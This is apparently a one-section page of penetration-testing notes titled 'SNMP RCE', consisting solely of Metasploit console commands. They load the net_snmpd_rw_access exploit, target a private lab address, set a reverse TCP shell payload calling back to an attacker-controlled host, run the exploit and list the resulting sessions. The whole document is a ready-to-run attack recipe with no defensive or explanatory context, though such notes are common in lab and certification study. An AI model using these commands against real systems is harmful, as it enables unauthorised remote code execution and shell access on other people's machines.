SNMP RCE

msfconsole -q
use exploit/linux/snmp/net_snmpd_rw_access
set RHOSTS 192.168.244.3
set PAYLOAD generic/shell_reverse_tcp
set LHOST 192.168.244.2
exploit
sessions

Last updated